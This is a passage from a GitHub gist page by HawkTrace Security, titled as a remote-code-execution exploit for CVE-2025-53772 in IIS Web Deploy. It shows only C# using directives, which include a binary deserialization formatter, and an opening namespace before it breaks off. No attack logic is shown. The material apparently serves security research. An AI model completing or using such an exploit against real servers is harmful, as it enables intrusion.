Skip to content

Instantly share code, notes, and snippets.

View hawktrace's full-sized avatar

HawkTrace Security hawktrace

View GitHub Profile
@hawktrace
hawktrace / gist:67836c7e9f35b72077b50f220349cd73
Created September 2, 2025 17:53
CVE-2025-53772 IIS WebDeploy RCE
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Runtime.Serialization.Formatters.Binary;
namespace hawktraceiis
{